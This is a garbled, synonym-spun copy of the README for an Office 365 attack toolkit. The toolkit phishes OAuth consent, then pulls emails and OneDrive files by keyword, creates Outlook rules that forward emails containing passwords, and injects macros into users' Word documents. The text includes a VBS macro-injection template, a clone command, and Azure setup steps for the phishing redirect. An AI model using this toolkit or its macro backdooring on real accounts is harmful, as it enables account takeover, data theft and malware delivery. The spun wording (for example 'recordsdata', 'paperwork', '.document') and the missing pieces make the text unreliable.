o365-attack-toolkit permits operators to accomplish an OAuth
Some of the applied options are :
- Extraction of keyworded e-mails from Outlook.
- Creation of Outlook Rules.
- Extraction of recordsdata from OneDrive/Sharepoint.
- Injection of macros on Word paperwork.
interface can be used to check out the extracted data from the Microsoft Graph API.
Outlook Keyworded Extraction
User emails will also be extracted by way of this toolkit the usage of key phrases. For each outlined key phrase within the configuration record, the entire emails that fit them might be downloaded and stored within the database. The operator can check out the downloaded emails during the control interface.
Onedrive/Sharepoint Keyworded Extraction
Microsoft Graph API can be utilized to get admission to recordsdata throughout OneDrive, OneDrive for Business and SharePoint report libraries. User recordsdata will also be extracted by way of this toolkit the usage of key phrases. For each outlined key phrase within the configuration record, the entire paperwork that fit them might be downloaded and stored in the community. The operator can read about the paperwork the usage of the control interface.
Outlook Rules Creation
Microsoft Graph API helps the advent of Outlook regulations. You can outline other regulations by way of hanging the rule of thumb JSON recordsdata within the regulations/ folder.
Below is an instance rule that after loaded, it is going to ahead each e mail that comprises password within the frame to
"displayName": "Example Rule",
Word Document Macro Backdooring
Users paperwork hosted on OneDrive will also be backdoored by way of injecting macros. If this option is enabled, the remaining 15 paperwork accessed by way of the consumer might be downloaded and backdoored with the macro outlined within the configuration record. After the backdoored record has been uploaded, the extension of the report might be modified to .document to ensure that the macro to be supported on Word. It will have to be famous that when backdooring the paperwork, they are able to now not be edited on-line which will increase the possibilities of our payload execution.
This capability can best be used on Windows for the reason that insertion of macros is finished the usage of the Word COM object. A VBS record is constructed by way of the template beneath and done so do not panic in the event you see
Dim wdApp Set wdApp = CreateObject("Word.Application") wdApp.Documents.Open("") wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "MACRO" wdApp.Documents(1).SaveAs2 "OUTPUT", 0 wdApp.Quit
How to arrange
Set wdApp = CreateObject("Word.Application")
wdApp.Documents(1).SaveAs2 "OUTPUT", 0
An instance configuration as beneath :
git clone https://github.com/0x09AL/o365-attack-toolkit
dep make sure that
Before get started the usage of this toolkit you wish to have to create an Application at the Azure Portal. Go to Azure -> App Registrations -> Register an utility.
After developing the appliance, reproduction the Application ID and alter it on
The URL(exterior listener) that might be used for phishing will have to be added as a Redirect URL. To upload a redirect url, pass the appliance and click on Add a Redirect URL.
The Redirect URL will have to be the URL that might be used to host the phishing endpoint, on this case
Make certain to test each the containers as proven beneath :
It will have to be famous that you’ll run this device on any Operating Systems that Go helps, however the Macro
The glance of the phishing web page will also be modified on
Apart from the entire options this device has, it additionally opens some assault floor at the host operating the device. Firstly, the Macro Backdooring Functionality will open the phrase recordsdata, and in case you are operating an unpatched model of Office, unhealthy issues can occur. Additionally, the extraction of recordsdata can obtain malicious recordsdata which might be stored for your pc.
The easiest manner could be separating the host correctly and best permitting verbal exchange with the HTTPS redirector and Microsoft Graph API.
The control interface permits the operator to browse the information that has been extracted.
View User Emails